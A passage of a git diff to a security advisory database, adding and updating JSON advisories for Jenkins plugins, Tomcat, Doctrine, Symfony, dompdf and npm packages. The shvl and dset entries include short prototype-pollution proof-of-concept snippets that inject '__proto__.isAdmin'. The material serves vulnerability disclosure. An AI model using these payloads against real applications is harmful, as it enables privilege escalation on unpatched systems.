vulnerability since the function 'set()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC Details\nThe 'set()' function accepts four arguments `object, path, val, obj`. Due to the absence of validation, at values passed into `path, val` arguments, an attacker can supply a malicious value by adjusting the `path` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `path` is the Object's own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst shvl = require('shvl');\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\nshvl.set(obj, '__proto__.isAdmin', true);\nconsole.log(\"After : \" + obj.isAdmin);\n```\n\n### Affected Environments\n1.0.0-2.0.1\n\n### Remediation\nThere are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn’t allow to add, remove, or change its properties. Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won’t have any prototype association by using “Object.create”.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "shvl" + }, + "ecosystem_specific": { + "affected_functions": [ + "(shvl).set" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "2.0.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/issues/34" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/pull/36" + }, + { + "type": "WEB", + "url": "https://github.com/robinvdvleuten/shvl/commit/513c0848774dfb114ad0d0554abf7927cfdd569e" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210320222933/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:00:24Z", + "nvd_published_at": "2020-12-29T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json b/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json index 238f97fb324a3..22ee5d1e989b4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json +++ b/advisories/github-reviewed/2022/05/GHSA-prw8-gqwp-f7fh/GHSA-prw8-gqwp-f7fh.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7915" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7915.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json b/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json new file mode 100644 index 0000000000000..84557a1ad0919 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv88-89rq-9fg6", + "modified": "2024-01-30T21:20:31Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10389" + ], + "summary": "Missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin ", + "details": "A missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin 1.24 and earlier allows attackers to have Jenkins initiate an HTTP connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:relution-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.24" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10389" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1053" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:31Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json b/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json new file mode 100644 index 0000000000000..9101a55691182 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvjh-7h8q-q56r", + "modified": "2024-02-07T23:37:52Z", + "published": "2022-05-14T02:42:23Z", + "aliases": [ + "CVE-2010-4312" + ], + "summary": "Apache Tomcat has cookies without HTTPOnly flag in Set-Cookie header", + "details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.35" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608286" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://launchpad.net/bugs/cve/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-4312" + }, + { + "type": "WEB", + "url": "https://ubuntu.com/security/CVE-2010-4312" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1004" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:37:52Z", + "nvd_published_at": "2010-11-26T20:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json b/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json index f47b3cc60d3a0..804e5c0d72cc4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json +++ b/advisories/github-reviewed/2022/05/GHSA-pw5c-xqf2-6xc2/GHSA-pw5c-xqf2-6xc2.json @@ -34,25 +34,6 @@ } ] }, - { - "package": { - "ecosystem": "Packagist", - "name": "doctrine/cache" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.3.2" - } - ] - } - ] - }, { "package": { "ecosystem": "Packagist", @@ -120,10 +101,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "2.5.0" }, { - "fixed": "2.4.8" + "fixed": "2.5.1" } ] } @@ -132,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/orm" + "name": "doctrine/mongodb-odm" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "0" }, { - "fixed": "2.5.1" + "fixed": "1.0.2" } ] } @@ -151,7 +132,7 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/mongodb-odm" + "name": "doctrine/mongodb-odm-bundle" }, "ranges": [ { @@ -161,7 +142,7 @@ "introduced": "0" }, { - "fixed": "1.0.2" + "fixed": "3.0.1" } ] } @@ -170,17 +151,17 @@ { "package": { "ecosystem": "Packagist", - "name": "doctrine/mongodb-odm-bundle" + "name": "zendframework/zendframework1" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.12.0" }, { - "fixed": "3.0.1" + "fixed": "1.12.16" } ] } @@ -189,17 +170,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zfcampus/zf-apigility-doctrine" + "name": "zendframework/zend-cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { - "fixed": "1.0.3" + "fixed": "2.5.3" } ] } @@ -215,7 +196,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0-stable" + "introduced": "3.0.0" }, { "fixed": "3.2.1" @@ -227,17 +208,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "doctrine/cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { - "fixed": "2.4.8" + "fixed": "1.3.2" } ] } @@ -246,17 +227,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework1" + "name": "zendframework/zend-cache" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.12.0" + "introduced": "2.4.0" }, { - "fixed": "1.12.16" + "fixed": "2.4.8" } ] } @@ -265,17 +246,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zend-cache" + "name": "zendframework/zendframework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.5.0" + "introduced": "2.4.0" }, { - "fixed": "2.5.3" + "fixed": "2.4.8" } ] } @@ -284,17 +265,17 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zend-cache" + "name": "zfcampus/zf-apigility-doctrine" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { - "fixed": "2.4.8" + "fixed": "1.0.3" } ] } @@ -306,10 +287,50 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5723" }, + { + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-07" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/aws/aws-sdk-php/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/cache/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/orm/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-cache/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-5723.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zfcampus/zf-apigility-doctrine/CVE-2015-5723.yaml" + }, { "type": "WEB", "url": "https://github.com/aws/aws-sdk-php/releases/tag/3.2.1" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2IUUC7HPN4XE5NNTG4MR76OC662XRZUO/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HPS7A54FQ2CR6PH4NDR6UIYJIRNFXW67/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IUUC7HPN4XE5NNTG4MR76OC662XRZUO/" @@ -318,6 +339,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HPS7A54FQ2CR6PH4NDR6UIYJIRNFXW67/" }, + { + "type": "WEB", + "url": "https://www.doctrine-project.org/2015/08/31/security_misconfiguration_vulnerability_in_various_doctrine_projects.html" + }, { "type": "WEB", "url": "http://framework.zend.com/security/advisory/ZF2015-07" diff --git a/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json b/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json new file mode 100644 index 0000000000000..b6562dfa1f738 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pwvj-6phx-qv8c", + "modified": "2024-01-30T22:40:37Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000014" + ], + "summary": "CSRF vulnerability in Jenkins Translation Assistance plugin", + "details": "Jenkins Translation Assistance Plugin 1.15 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to override localized strings displayed to all users on the current Jenkins instance if the victim is a Jenkins administrator.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:translation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.15" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000014" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102809" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:40:37Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json b/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json new file mode 100644 index 0000000000000..a83008e13ad8c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px35-882c-47hw", + "modified": "2024-01-30T21:27:36Z", + "published": "2022-05-24T22:00:03Z", + "aliases": [ + "CVE-2019-10326" + ], + "summary": "Jenkins Warnings NG Plugin cross-site request forgery vulnerability", + "details": "A cross-site request forgery vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attackers to reset warning counts for future builds.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:warnings-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10326" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/warnings-ng-plugin/blob/main/CHANGELOG.md#510---2019-5-31" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1391" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:27:36Z", + "nvd_published_at": "2019-05-31T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json b/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json new file mode 100644 index 0000000000000..91333fb09ff45 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q4xc-7cw8-cgfj", + "modified": "2024-02-01T21:04:19Z", + "published": "2022-05-24T17:37:26Z", + "aliases": [ + "CVE-2020-28277" + ], + "summary": "dset vulnerable to prototype pollution", + "details": "### Overview\nPrototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module 'dset' can be abused by Prototype Pollution vulnerability since the function ‘export ()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC\nThe export function accepts three arguments `obj, keys, val`. Due to the absence of validation, at values passed into `keys, val` arguments, an attacker can supply a malicious value by adjusting the `keys` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `keys` is the Object's own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst dset = require('dset');\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\ndset(obj, '__proto__.polluted', true);\nconsole.log(\"After : \" + obj.polluted);\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "dset" + }, + "ecosystem_specific": { + "affected_functions": [ + "(dset)" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "2.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/commit/2b9ec49e231107b1a83b04a1bc1a66a8d14cea1c" + }, + { + "type": "WEB", + "url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210104204657/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:04:19Z", + "nvd_published_at": "2020-12-29T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json b/advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json similarity index 75% rename from advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json rename to advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json index 50d757e1ccd33..239159eba4727 100644 --- a/advisories/unreviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json +++ b/advisories/github-reviewed/2022/05/GHSA-q5wm-qgxj-h9ph/GHSA-q5wm-qgxj-h9ph.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-q5wm-qgxj-h9ph", - "modified": "2022-05-13T01:15:05Z", + "modified": "2024-01-30T22:04:47Z", "published": "2022-05-13T01:15:05Z", "aliases": [ "CVE-2019-10293" ], + "summary": "Missing permission check in Jenkins Kmap Plugin allow SSRF", "details": "A missing permission check in Jenkins Kmap Plugin in KmapJenkinsBuilder.DescriptorImpl form validation methods allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", "severity": [ { @@ -14,7 +15,15 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "rg.jenkins-ci.plugins:kmap-jenkins" + }, + "versions": [ + "1.6" + ] + } ], "references": [ { @@ -39,8 +48,8 @@ "CWE-862" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:04:26Z", "nvd_published_at": "2019-04-04T16:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json b/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json new file mode 100644 index 0000000000000..78aeb8e04050c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q83c-64c9-c42m", + "modified": "2024-02-01T21:16:49Z", + "published": "2022-05-17T19:57:15Z", + "aliases": [ + "CVE-2014-5012" + ], + "summary": "DOMPDF denial of service vulnerability", + "details": "DOMPDF before 0.6.2 allows denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "dompdf/dompdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.6" + }, + { + "fixed": "0.6.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5012" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5012.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" + }, + { + "type": "WEB", + "url": "https://github.com/dompdf/dompdf/releases/tag/v0.6.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:16:49Z", + "nvd_published_at": "2020-01-10T06:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json b/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json index c8263e12a38ca..185407e1adf05 100644 --- a/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json +++ b/advisories/github-reviewed/2022/05/GHSA-q87v-q8fw-gmj5/GHSA-q87v-q8fw-gmj5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q87v-q8fw-gmj5", - "modified": "2023-10-31T19:57:43Z", + "modified": "2024-02-08T19:47:42Z", "published": "2022-05-24T16:46:23Z", "aliases": [ "CVE-2017-11365" @@ -15,6 +15,158 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.30" + }, + { + "fixed": "2.7.32" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.23" + }, + { + "fixed": "2.8.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.10" + }, + { + "fixed": "3.2.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.3" + }, + { + "fixed": "3.3.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.30" + }, + { + "fixed": "2.7.32" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.23" + }, + { + "fixed": "2.8.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.10" + }, + { + "fixed": "3.2.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.3" + }, + { + "fixed": "3.3.5" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,7 +177,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.7.0" + "introduced": "2.7.30" }, { "fixed": "2.7.32" @@ -44,7 +196,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.8.0" + "introduced": "2.8.23" }, { "fixed": "2.8.25" @@ -63,7 +215,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.2.0" + "introduced": "3.2.10" }, { "fixed": "3.2.12" @@ -82,7 +234,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.3.0" + "introduced": "3.3.3" }, { "fixed": "3.3.5" @@ -105,6 +257,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/878198cefae028386c6dc800ccbf18f2b9cbff3f" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2017-11365.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-11365.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-11365.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -112,6 +276,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2017-11365-empty-passwords-validation-issue" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-11365" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json b/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json index 6beb6e9bc7e06..46dc403540304 100644 --- a/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json +++ b/advisories/github-reviewed/2022/05/GHSA-q8j7-fjh7-25v5/GHSA-q8j7-fjh7-25v5.json @@ -90,6 +90,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.24" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.1.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.2.0" + }, + { + "fixed": "2.2.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.3" + } + ] + } + ] } ], "references": [ @@ -105,10 +181,22 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/86364" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-4751.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/validator/CVE-2013-4751.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/validator" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-releases-symfony-2-0-24-2-1-12-2-2-5-and-2-3-3-released" + }, { "type": "WEB", "url": 